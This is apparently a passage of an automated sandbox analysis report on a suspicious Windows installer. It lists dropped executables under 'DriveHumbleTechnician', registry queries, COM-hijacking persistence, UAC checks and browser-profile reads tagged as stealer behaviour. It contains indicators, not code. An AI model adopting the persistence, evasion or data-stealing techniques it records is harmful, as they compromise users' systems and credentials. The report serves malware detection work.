File opened (read-only) \??\I: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\L: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\X: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\K: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\S: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\W: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\R: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_841DF67C840691A847835C0F760B4DC0 C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_841DF67C840691A847835C0F760B4DC0 C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PpMCUaskmPAB.exe.log C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Checks installed software on the system

discovery

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\sk\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\hu\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\prefs.json C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
File created C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\_metadata\verified_contents.json C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\et.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\fil.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\PrivacySandboxAttestationsPreloaded\manifest.json C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File opened for modification C:\Program Files\Crashpad\settings.dat C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\zu\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\zh_CN\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\manifest.fingerprint C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\bg.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\uk.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe58e932.TMP C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\pa\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\updater.log.old C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\updater.log C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe N/A
File created C:\Program Files (x86)\Google\GoogleUpdater\f66e3c9a-e629-43a2-9c88-be81f7fbbe16.tmp C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\resources.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\offscreendocument.html C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\dxil.dll C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\bn.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\VisualElements\SmallLogoBeta.png C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\fr_CA\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\eu\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\Google\GoogleUpdater\769035ab-fd69-4a33-bedf-99680dc5e6e1.tmp C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\af.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\hi\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\ka\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\de\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\en\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\ca\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\iw\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\dasherSettingSchema.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\chrome_elf.dll C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\fa\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\ko.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\130.0.6723.117\Installer\setup.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\hr\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\lv\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\vi.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\updater.log.old C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\hr.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\pl.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\v8_context_snapshot.bin C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\VisualElements\SmallLogoDev.png C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\ro.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\en_GB\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\gu\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\CHROME.PACKED.7Z C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\Locales\ml.pak C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\VisualElements\SmallLogo.png C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\chrome_wer.dll C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source4168_1857885555\Chrome-bin\130.0.6723.117\libEGL.dll C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\th\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\fr\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\cs\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1544_1638013986\_locales\nl\messages.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\prefs.json C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
File created C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{E3535876-7CDF-474D-9B78-FC4A9ADEFD7C} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF6D3.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57f59d.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57f59b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57f59b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe N/A
N/A N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe N/A
N/A N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\130.0.6723.117\elevation_service.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = … C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
